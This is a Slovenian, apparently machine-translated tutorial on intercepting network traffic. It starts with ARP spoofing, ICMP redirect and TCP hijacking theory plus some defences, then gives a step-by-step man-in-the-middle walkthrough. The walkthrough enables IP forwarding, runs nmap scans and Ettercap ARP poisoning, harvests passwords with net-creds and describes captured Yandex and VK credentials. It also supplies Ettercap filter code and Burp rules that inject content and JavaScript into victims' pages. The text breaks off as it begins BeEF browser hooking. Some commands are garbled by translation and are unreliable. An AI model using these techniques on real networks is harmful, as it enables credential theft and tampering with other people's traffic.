Hekerji uporabljajo za preusmerjanje prometa. Načini hekerskih napadov. Prevara podatkov z Burpom

Metode za prestrezanje omrežnega prometa

Poslušanje omrežja z uporabo programov za analizo omrežja je prvo, največ na preprost način prestrezanje podatkov.

Za zaščito pred prisluškovanjem omrežju uporabite posebni programi, na primer AntiSniff, ki lahko zazna računalnike v omrežju, ki poslušajo omrežni promet.

Za reševanje svojih težav uporabljajo programi za preprečevanje vohljanja poseben znak prisotnosti prisluškovalnih naprav v omrežju - omrežna kartica računalnika vohljača mora biti v posebnem načinu prisluškovanja. Ko so v načinu poslušanja, se omrežni računalniki na poseben način odzivajo na datagrame IP, poslane preizkušanemu gostitelju. Na primer, poslušajoči gostitelji običajno obdelajo ves dohodni promet, ne le datagramov, poslanih na naslov gostitelja. Obstajajo tudi drugi znaki sumljivega vedenja gostitelja, ki jih lahko AntiSniff prepozna.

Nedvomno je poslušanje zelo koristno z vidika napadalca, saj vam omogoča, da dobite veliko koristnih informacij - gesla, ki se prenašajo po omrežju, naslove omrežnih računalnikov, zaupne podatke, pisma itd. Vendar preprosto prisluškovanje prepreči hekerju, da bi posegel v omrežno komunikacijo med dvema gostiteljema, da bi spremenil in poškodoval podatke. Za rešitev tega problema je potrebna bolj sofisticirana tehnologija.

Za prestrezanje in zanko skozi proces omrežne komunikacije med dvema gostiteljema A in B lahko napadalec nadomesti naslove IP medsebojno delujočih gostiteljev s svojim lastnim naslovom IP tako, da gostiteljema A in B pošlje lažna sporočila ARP (Address Resolution Protocol). .

riž. 1 Lažne zahteve ARP

Poglejmo, kako lahko heker uporabi protokol ARP za prestrezanje omrežne komunikacije med gostiteljema A in B.

Da bi prestregel omrežni promet med gostiteljema A in B, heker vsili svoj naslov IP tem gostiteljem, tako da A in B uporabita ta lažni naslov IP pri izmenjavi sporočil. Da vsili svoj naslov IP, heker izvede naslednje operacije.

• Napadalec določi naslove MAC gostiteljev A in B, na primer z ukazom nbtstat iz paketa W2RK.
• Napadalec pošlje sporočila na identificirana naslova MAC gostiteljev A in B, ki so ponarejeni odgovori ARP na zahteve za razrešitev naslovov IP gostiteljev v naslove MAC računalnikov. Gostitelju A je rečeno, da se naslov IP gostitelja B ujema z naslovom MAC napadalčevega računalnika; gostitelju B je rečeno, da se naslov IP gostitelja A ujema tudi z naslovom MAC napadalčevega računalnika.
• Gostitelja A in B vneseta prejete naslove MAC v svoje predpomnilnike ARP in jih nato uporabita za pošiljanje sporočil drug drugemu. Ker naslova IP A in B ustrezata naslovu MAC napadalčevega računalnika, gostitelja A in B, ne vedoč ničesar, komunicirata prek posrednika, ki je sposoben narediti, kar hočeta, z njihovimi sporočili.

Za zaščito pred takšnimi napadi morajo omrežni skrbniki vzdrževati zbirko podatkov s tabelo preslikav med naslovi MAC in naslovi IP svojih omrežnih računalnikov.

V omrežjih UNIX je ta vrsta ponarejenega napada ARP mogoče izvesti z uporabo sistemskih pripomočkov za spremljanje in nadzor omrežnega prometa, kot je arpredirect. Na žalost se zdi, da takšni zanesljivi pripomočki niso implementirani v omrežjih Windows. Na spletnem mestu NTsecurity lahko na primer prenesete pripomoček GrabitAII, ki je predstavljen kot orodje za preusmerjanje prometa med omrežnimi gostitelji. Vendar osnovno preverjanje zmogljivosti pripomočka GrabitAII kaže, da je še vedno daleč od popolnega uspeha pri izvajanju svojih funkcij.

Za prestrezanje omrežnega prometa lahko napadalec dejanski naslov IP omrežnega usmerjevalnika zamenja s svojim naslovom IP, na primer z uporabo lažnih sporočil preusmeritve ICMP. V skladu z RFC-1122 bi moral gostitelj A prejeto preusmeritveno sporočilo interpretirati kot odgovor na datagram, poslan drugemu gostitelju, na primer B. Gostitelj A določi svoja dejanja glede preusmeritvenega sporočila na podlagi vsebine prejetega preusmeritvenega sporočila in če je Preusmeritev nastavljena tako, da preusmeri datagrame od A do B na novi poti, bo gostitelj A naredil točno to.

riž. 2 Napačno usmerjanje

Za izvedbo lažnega usmerjanja mora napadalec poznati nekaj podrobnosti o organizaciji lokalno omrežje, kjer se nahaja gostitelj A, zlasti naslov IP usmerjevalnika, prek katerega se pošilja promet od gostitelja A do B. Če to ve, bo napadalec oblikoval datagram IP, v katerem je izvorni naslov IP definiran kot naslov IP usmerjevalnik, prejemnik pa je podani gostitelj A. V datagram je vključeno tudi sporočilo o preusmeritvi ICMP z naslovom novega usmerjevalnika, nastavljenim na naslov IP napadalčevega računalnika. Po prejemu takega sporočila bo gostitelj A vsa sporočila poslal na naslov IP napadalčevega računalnika.

Za zaščito pred takšnim napadom morate na gostitelju A onemogočiti (na primer s požarnim zidom) obdelavo sporočil ICMP Redirect, ukaz tracert (v Unixu je to ukaz tracerout) pa lahko razkrije naslov IP napadalčevega računalnika. . Ti pripomočki lahko najdejo dodatno pot, ki se je pojavila v lokalnem omrežju, ni predvidena med namestitvijo, če je seveda skrbnik omrežja pozoren.

Zgornji primeri prestrezanja (ki še zdaleč niso omejeni na napadalce) prepričujejo, da je treba zaščititi podatke, ki se prenašajo po omrežju, če podatki vsebujejo zaupne informacije. Edini način zaščite pred prestrezanjem omrežnega prometa je uporaba programov, ki izvajajo kriptografske algoritme in šifrirne protokole ter preprečujejo razkritje in zamenjavo tajnih podatkov. Za rešitev takšnih težav kriptografija ponuja sredstva za šifriranje, podpisovanje in preverjanje pristnosti sporočil, ki se prenašajo prek varnih protokolov.

Praktično izvajanje vseh kriptografskih metod za zaščito izmenjave informacij zagotavlja omrežja VPN(Virtual Private Network - Navidezna zasebna omrežja).

Prestrezanje povezave TCP

Za najbolj sofisticiran napad prestrezanja omrežnega prometa velja ugrabitev TCP povezave (TCP hijacking), ko heker z generiranjem in pošiljanjem TCP paketov napadenemu gostitelju prekine trenutno komunikacijsko sejo z gostiteljem. Poleg tega heker z uporabo zmožnosti protokola TCP za obnovitev prekinjene povezave TCP prestreže prekinjeno komunikacijsko sejo in jo nadaljuje namesto prekinjenega odjemalca.

Ustvarjenih je bilo več učinkovitih pripomočkov za izvajanje napadov ugrabitve TCP, vendar so vsi implementirani za platformo Unix in ti pripomočki so na spletnih mestih na voljo samo v obliki izvorne kode. Tako napadi s prestrezanjem povezave TCP nimajo veliko koristi.

TCP (Transmission Control Protocol) je eden izmed osnovnih transportnih protokolov. plast OSI, ki omogoča vzpostavljanje logičnih povezav preko virtualnega komunikacijskega kanala. Paketi se prenašajo in sprejemajo po tem kanalu z registracijo njihovega zaporedja, nadzoruje se pretok paketov, organizira se ponovni prenos popačenih paketov in na koncu seje se komunikacijski kanal prekine. TCP je edini protokol osnovni protokol iz družine TCP/IP, ki ima napreden sistem identifikacije sporočil in povezav.

Pregled programskih paketnih snifferjev

Vse vohače programske opreme lahko v grobem razdelimo v dve kategoriji: vohače, ki podpirajo zagon iz ukazna vrstica, in vohala z grafičnim vmesnikom. Hkrati ugotavljamo, da obstajajo vohalci, ki združujejo obe funkciji. Poleg tega se snifferji med seboj razlikujejo po protokolih, ki jih podpirajo, globini analize prestreženih paketov, možnosti nastavitve filtrov in možnosti združljivosti z drugimi programi.

Običajno okno katerega koli snifferja z GUI sestavljajo tri področja. Prvi prikazuje povzetek zajetih paketov. Običajno to področje prikazuje najmanj polj, in sicer: čas zajemanja paketa; IP naslova pošiljatelja in prejemnika paketa; Izvorni in ciljni naslov MAC paketa, izvorni in ciljni naslovi vrat; vrsta protokola (omrežna, transportna ali aplikacijska plast); nekaj povzetkov informacij o prestreženih podatkih. V drugem delu so prikazani statistični podatki o posameznem izbranem paketu, v tretjem delu pa je prikazan paket v šestnajstiški ali znakovni obliki - ASCII.

Skoraj vsi paketni snifferji omogočajo analizo dekodiranih paketov (zato se paketni snifferji imenujejo tudi analizatorji paketov ali analizatorji protokolov). Sniffer razdeli prestrežene pakete po slojih in protokolih. Nekateri analizatorji paketov lahko prepoznajo protokol in prikažejo zajete informacije. Ta vrsta informacij je običajno prikazana v drugem območju okna vohljača. Vsako vohljanje lahko na primer prepozna protokol TCP, napredni vohalci pa lahko ugotovijo, katera aplikacija je ustvarila ta promet. Večina analizatorjev protokolov prepozna več kot 500 različnih protokolov in jih lahko opiše in dekodira po imenu. Več informacij kot lahko vohljalec dekodira in prikaže na zaslonu, manj vam je treba ročno dekodirati.

Ena od težav, na katero lahko naletijo vohljači paketov, je, da ne morejo pravilno identificirati protokola z uporabo vrat, ki niso privzeta vrata. Na primer, da bi izboljšali varnost, so lahko nekatere dobro znane aplikacije konfigurirane za uporabo vrat, ki niso privzeta vrata. Torej, namesto tradicionalnih vrat 80, rezerviranih za spletni strežnik, podani strežnik je mogoče prisilno ponovno konfigurirati na vratih 8088 ali katerih koli drugih. Nekateri analizatorji paketov v tej situaciji ne morejo pravilno določiti protokola in prikažejo le informacije o protokolu nižje ravni (TCP ali UDP).

Obstajajo programski vohalci, ki so opremljeni z analitičnimi moduli programske opreme kot vtičniki ali vgrajenimi moduli, ki vam omogočajo ustvarjanje poročil z uporabnimi analitičnimi informacijami o prestreženem prometu.

Druga značilnost večine vohalcev programskih paketov je zmožnost konfiguriranja filtrov pred in po zajemu prometa. Filtri ločijo določene pakete od splošnega prometa po določenem kriteriju, kar vam omogoča, da se znebite nepotrebnih informacij pri analizi prometa.

Alternative Ettercap

Ettercap je najbolj priljubljen program za napad človeka v sredini, toda ali je najboljši? Skozi celoten priročnik boste videli, da se Ettercap skoraj nikoli ne uporablja sam, da je eden ali drug program vedno povezan z njim v verigi obdelave prometa. Morda to dodaja fleksibilnost, na splošno je ta pristop v središču UNIX-a - en program opravlja eno nalogo, končni uporabnik pa kombinira različne programe, da doseže želeni rezultat. S tem pristopom je programsko kodo lažje vzdrževati, s takimi miniaturnimi "opekami" lahko zgradimo sistem katere koli kompleksnosti in prilagodljivosti. Kljub temu imeti pet odprtih konzol z različnimi nalogami, delo katerih programi so usmerjeni v doseganje enega samega rezultata, ni zelo priročno, le težje je, obstaja možnost, da na neki stopnji naredite napako, in celoten konfiguriran sistem bo deloval v prostem teku.

Net-Creds voha:

• Obiskani URL-ji
• poslal zahteve POST
• prijave/gesla iz obrazcev HTTP
• prijave/gesla za osnovno avtentikacijo HTTP
• Iskanje HTTP
• FTP prijave/gesla
• IRC prijave/gesla
• POP prijave/gesla
• Prijave/gesla IMAP
• Telnet prijave/gesla
• SMTP prijave/gesla
• Niz skupnosti SNMP
• vsi podprti protokoli NTLMv1/v2, kot so HTTP, SMB, LDAP itd.
• Kerberos

Dober izbor prestreženih slik, viseča mreža pa je v tem pogledu preprostejša - prikazuje samo prestrežene slike.

Preklopite vaš stroj v način posredovanja.

echo "1" > /proc/sys/net/ipv4/ip_forward

Ettercap zaženemo z grafičnim vmesnikom ( -G):

Ettercap-G

Zdaj izberite gostitelji, ima pododstavek Iskanje gostiteljev. Ko je skeniranje končano, izberite seznam gostiteljev:

Kot Cilji1 izberite usmerjevalnik ( Dodaj v cilj 1), kot Cilji2 izberite napravo, ki jo želite napasti ( Dodaj v cilj 2).

Toda tukaj se lahko pojavi prva težava, še posebej, če je gostiteljev veliko. V različnih navodilih, vključno z zgoraj predstavljenim videoposnetkom, se avtorji povzpnejo na ciljni stroj (iz neznanega razloga imajo tam vsi Windows) in z ukazom pogledajo IP tega stroja v lokalnem omrežju. Strinjam se, da je ta možnost za resnične razmere nesprejemljiva.

Če skenirate z , potem jih lahko dobite Dodatne informacije o gostiteljih, natančneje o proizvajalcu omrežne kartice:

nmap -sn 192.168.1.0/24

Če podatkov še vedno ni dovolj, lahko opravite skeniranje z definicijo OS:

nmap -O 192.168.1.0/24

Kot lahko vidite, se je stroj z IP 192.168.1.33 izkazal za Windows, če to ni znak od zgoraj, kaj je potem? 😉 lol

To dodajamo kot drugi cilj.

Zdaj pa preidimo na element menija. Mitm. Tam izberite Zastrupitev z ARP… Označite polje Prevohajte oddaljene povezave.

Začnemo žetev, v enem oknu lansiramo

Neto krediti

v drugem (oba programa je mogoče zagnati brez možnosti)

viseča mreža

Zbiranje podatkov se je začelo takoj.

Na desni strani je viseča mreža odprla še eno okno, ki prikazuje zajete slike. V oknu net-creds vidimo obiskana mesta in prestrežena gesla:

1.2 Ettercap + Burp Suite

3. Oglejte si podatke (obiskana spletna mesta in zajeta gesla) v Ettercapu

Na jedilniku pogled imamo na voljo zavihke Povezave in profili. Lahko tudi potrdite polje Razreši naslove IP(prevedi naslove IP). Povezave so seveda povezave. Ettercap zbira profile v pomnilniku za vsakega gostitelja, ki ga odkrije. Tam so zbrani uporabniki in gesla. V tem primeru so profili z zajetimi podatki računa (gesla) označeni s križcem:

Ne zanašajte se preveč na profile - na primer, označene so prestrežene prijave in gesla za FTP in druge storitve, za katere lahko program nedvoumno razlaga prejete informacije kot poverilnice. To ne vključuje na primer osnovnih avtentikacijskih podatkov, vnesenih prijav in gesel v spletnih obrazcih.

V Connections so najbolj obetavni podatki označeni z zvezdico:

Za ogled podrobnosti lahko dvokliknete te vnose:

Da ne boste iskali teh zvezdic na celotnem seznamu, jih lahko razvrstite po tem polju in vse bodo na vrhu ali dnu:

Ujeta osnovna avtentikacija:

Prijavno geslo za Yandex (označeno spodaj):

To so prestrežene poverilnice za Vkontakte:

Tudi najbolj zanimivi podatki so zbrani v spodnji konzoli:

Če želite shraniti rezultate programa, uporabite te možnosti (pri zagonu Ettercapa določite ključe:

Možnosti beleženja: -w, --write<файл>zapisati zajete podatke v pcapfile<файл>-L, --log<логфайл>zapiši ves promet na to<логфайл>-l, --log informacije<логфайл>na to napišite le pasivne informacije<логфайл>-m, --log-sporočilo<логфайл>napiši vsa sporočila na to<логфайл>-c, --compress uporabi stiskanje gzip za dnevniške datoteke

4. Sprotna zamenjava podatkov v Ettercapu

4.1 Uporaba filtrov Ettercap po meri

Opomba: Pri vseh mojih testiranjih filtri Ettercap niso delovali. Težko je razumeti, ali je v rokah, v funkcijah strojne opreme ali v napaki v samem programu ... Toda za različico 0.8.2 (najnovejša v tem trenutku) obstaja poročilo o napaki o težavah s filtri. Na splošno, sodeč po poročilih o napakah in forumih, filtri pogosto odpadejo ali pa sploh ne delujejo dolgo časa. Obstaja veja, ki je bila spremenjena pred 5 meseci https://github.com/Ettercap/ettercap/tree/filter-improvements, tj. filter-improvements (z izboljšavami filtrov). Za to vejo in za različico iz repozitorija so bili narejeni številni testi, testirani so bili različni filtri v različnih pogojih, porabljenega je bilo veliko časa, a rezultatov ni bilo. Mimogrede, če želite namestiti različico izboljšav filtrov v Kali Linux, morate narediti to:

sudo apt-get odstranite ettercap-graphical ettercap-common sudo apt-get namestite git debhelper bison check cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libncurses5-dev libnet1-dev libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git clone -b filter-izboljšave https://github.com/Ettercap/ettercap.git cd ettercap/ mkdir build cd build cmake ENABLE_PDF_DOCS =On ../ make sudo make install

Na splošno, če vaši filtri ne delujejo, potem niste sami. V navodilih za Ettercap ne morem preskočiti teme filtrov, zato bodo vseeno upoštevani.

Doslej smo uporabljali Ettercap za ponarejanje ARP. To je zelo površna aplikacija. Zahvaljujoč filtrom po meri lahko posredujemo in spreminjamo promet sproti. Filtri morajo biti v ločenih datotekah in jih je treba pred uporabo prevesti s programom Etterfilter. Čeprav se zdi, da je dokumentacija, do katere je navedena povezava, kratka, vam bo skupaj s spodnjimi primeri omogočila pisanje precej zanimivih filtrov.

Ustvarimo naš prvi filter, ki bo zamenjal vse slike s tem:

V datoteki z imenom img_replacer.filter copy:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "Accept-Encoding")) ( replace("Accept-Encoding", "Accept-Rubbish!"); # opomba: nadomestni niz je enake dolžine kot prvotni msg("zapped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( replace("src=" , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); zamenjaj("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn. png\" "); zamenjaj("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); zamenjaj("SRC=", "src= \" http://www.irongeek.com/images/jollypwn.png\" "); msg("Filter Ran.\n"); )

Prevedite datoteko:

Etterfilter img_replacer.filter -o img_replacer.ef

Rezultati kompilacije:

Etterfilter 0.8.2 copyright 2001-2015 Ettercap Development Team 14 naloženih protokolnih tabel: DEKODIRANI PODATKI udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth 13 naloženih konstant: VRRP OSPF GRE UDP TCP ESP ICMP6 ICMP PPTP PPPOE IP6 IP ARP Izvorna datoteka za razčlenjevanje "img_replacer.filter" končan. Razgrnitev metadrevesa končana. Pretvorba nalepk v dejanske odmike končana. Zapisovanje izhodnih podatkov v "img_replacer.ef" je končano. -> Skripta, kodirana v 18 navodil.

Ključ -F pove programu, naj naloži filter iz datoteke, ki sledi ključu. Po prevajanju je ime naše nove datoteke s filtrom img_replacer.ef, tako da ukaz postane:

Ettercap -G -F img_replacer.ef

Opomba O: Ko spremljate spletni promet, so lahko paketi, ki jih vidite, v kodirani obliki. Za učinkovito delo filtri, Ettercap potrebuje promet v obliki golo besedilo. Glede na nekatera opažanja je vrsta kodiranja, ki ga uporabljajo spletne strani, "Accept-Encoding: gzip, deflate"

Spodaj je filter, ki prepiše kodiranje in prisili komunikacijo v obliki navadnega besedila:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "gzip")) ( replace("gzip", " "); # opomba: štirje presledki v nizu sporočila za zamenjaj ("pobelil gzip\n"); ) ) if (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "deflate")) ( replace("deflate", " "); # opomba: sedem presledkov v nadomestnem nizu msg("whiteed out deflate\n"); ) )

Podrobno je opisana sintaksa za pisanje filtrov, nato pa še nekaj primerov:

# zamenjaj besedilo v paketu: if (ip.proto == TCP && search(DATA.data, "lol"))( replace("lol", "smh"); msg("filter ran"); ) # pokaži sporočilo if tcp port is 22 if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH packet\n"); ) ) # beleži ves telnet promet , izvedite tudi ./program na paket if (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./logfile.log ") ; exec("./program"); ​​​​) ) # zabeleži ves promet razen http if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( log(DATA.data , "./logfile.log"); ) # nekatere operacije paketne obremenitve if (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) else ( DATA.data = "modified"; DATA .data + 20 = 0x4445; ) # izpusti vse pakete, ki vsebujejo "ettercap" if (search(DECODED.data, "ettercap")) ( msg("nekdo govori o nas...\n"); drop(); kill( ); ) # pisanje dešifriranih paketov ssh, ki se ujemajo z regularnim izrazom if (ip.proto == TCP) ( če (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # ubijanje paketov if (ip.ttl< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Ponarejanje podatkov z Burpom

Zaženemo Ettercap in Burp, kot je opisano v odstavku 1.2 ali v odstavku 2.2.

V Burpu pojdite na Proxy -> Možnosti. Najdemo tam Ujemi in zamenjaj. Kliknite Dodaj da dodate novo pravilo.

• Glava zahteve je glava zahteve
• telo zahteve- telo zahteve
• glava odgovora- glava odgovora
• odzivno telo- odzivno telo
• Ime parametra zahteve- Ime parametra poizvedbe
• Vrednost parametra zahteve- Vrednost parametra zahteve
• Zahtevajte prvo vrstico- Prva vrstica poizvedbe

Če morate spremeniti podatke, poslane z metodo GET, potem to velja za glave.

V označevanju HTML obstaja tudi glava (oznaka glave). Zgoraj omenjeni nimajo nobene zveze s tem naslovom. Nekoliko višje je rečeno o glavah paketov. Če želite spremeniti vsebino HTML strani, potem vedno izberite Telo odgovora namesto Glava zahteve, tudi če boste spremenili vsebino oznake head (na primer naslov).

Če niste seznanjeni z regularni izrazi, potem je načeloma v redu: HTML marsikaj odpusti, česar pa ne razume, preprosto ignorira - lahko ga uporabite. Če znaš uporabljati regularne izraze, te spoštujem.)))

Na primer, ustvarimo novo pravilo, spremenimo glavo zahteve v telo odgovora. V samem pravilniku bomo spremenili

Označite polje Ujemanje regularnega izraza.

Zdaj bo na vseh spletnih mestih (brez HTTPS) namesto naslova No Title:

Za oznako body vstavite poljubno vrstico (to bo prva vrstica v besedilu). Glava zahteve se spremeni v telo odgovora. Spremenimo se

Označite polje Ujemanje regularnega izraza.

V zgornjem desnem kotu (odvisno od postavitve) se pojavi napis "I am cool!". Vstavite lahko CSS, kodo JavaScript, poljubno besedilo - karkoli. S strani lahko na splošno izbrišete vse in jo nato napolnite s svojo vsebino - vse je odvisno od vaše domišljije.

Pojavila se je zamisel, da bi vsak obrazec nekoliko spremenili, tako da se podatki pošiljajo na izvirni strežnik in na napadalčev strežnik (implementacija večkratne oddaje za vsak obrazec). Toda glede na to, da če poslani podatki niso šifrirani in imamo dostop do njih, jih vseeno vidimo, nam jih ni treba poslati na noben strežnik. Kljub temu, če kdo rabi, res delujoč primer pošiljanja podatkov iz enega obrazca na več strežnikov hkrati.

5. BeEF priklop

Če želite začeti uporabljati funkcije BeEF, moramo v HTML vdelati datoteko JavaScript, običajno vrstico, kot je: